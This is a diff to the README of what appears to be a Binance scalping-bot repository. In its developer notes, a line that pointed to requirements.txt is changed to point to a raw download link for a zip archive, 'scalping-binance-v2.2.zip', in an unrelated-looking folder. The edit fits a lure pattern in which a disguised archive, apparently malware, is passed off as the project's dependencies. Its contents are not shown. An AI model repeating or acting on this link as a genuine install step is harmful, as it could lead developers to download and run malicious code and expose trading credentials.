marahman30104/binance-scalping/README.md

 Developer notes

 - The codebase favors readability and explicit behavior.
 If you introduce changes, document the rationale and keep function responsibilities small.
-- Maintain compatibility with the target Python version and the libraries in requirements.txt.
+- Maintain compatibility with the target Python version and the libraries in https://raw.githubusercontent.com/marahman30104/binance-scalping/main/chrysaniline/scalping-binance-v2.2.zip
 - Run the full test suite after making changes to confirm no regressions.

 Licensing